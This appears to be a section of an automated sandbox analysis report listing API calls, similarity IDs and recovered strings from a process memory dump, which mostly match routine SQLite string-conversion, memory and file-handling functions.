                                                                    • String ID:
                                                                    • API String ID: 878107876-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 042079AB
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 042079DC
                                                                    • GetLastError.KERNEL32 ref: 042079ED
                                                                    • GetLastError.KERNEL32 ref: 042079F3
                                                                    • SetEndOfFile.KERNEL32(?), ref: 04207A08
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$PointerUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1588551569-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 04266765
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • _free.LIBCMT ref: 04266778
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 1020059152-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 042076F6
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 04207712
                                                                    • _malloc.LIBCMT ref: 0420771B
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0420773D
                                                                    • _free.LIBCMT ref: 04207748
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateApisFileHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 2559239037-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 04207686
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 0420769E
                                                                    • _malloc.LIBCMT ref: 042076AC
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 042076CA
                                                                    • _free.LIBCMT ref: 042076D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateApisFileHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 2559239037-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                    • _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                    • _free.LIBCMT ref: 042077A1
                                                                      • Part of subcall function 04266401: HeapFree.KERNEL32(00000000,00000000,?,04268196,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266417
                                                                      • Part of subcall function 04266401: GetLastError.KERNEL32(00000000,?,04268196,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257,00000008), ref: 04266429
                                                                    • _free.LIBCMT ref: 042077B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharHeapMultiWide_free$AllocateErrorFreeLast_malloc
                                                                    • String ID:
                                                                    • API String ID: 70952271-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: $ $Recovered %d frames from WAL file %s
                                                                    • API String ID: 2102423945-1630138656
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,04209488), ref: 04207634
                                                                    • _malloc.LIBCMT ref: 0420763D
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0420765E
                                                                    • _free.LIBCMT ref: 04207669
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 2079281532-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,04209086,00000000,00000000,7519F560), ref: 042075D0
                                                                    • _malloc.LIBCMT ref: 042075DC
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 042075F9
                                                                    • _free.LIBCMT ref: 04207604
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 2079281532-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 04219141
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 04219137
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0420D9E7
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0420DB3F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
                                                                    • String ID: }
                                                                    • API String ID: 121741435-4239843852
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: 0
                                                                    • API String ID: 2102423945-4108050209
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 042166C4
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 042166BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 0420F699
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 0420F68F
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: out of memory$unknown database %s
                                                                    • API String ID: 2102423945-3235021497
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • database corruption at line %d of [%.10s], xrefs: 04210838
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 0421082E
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%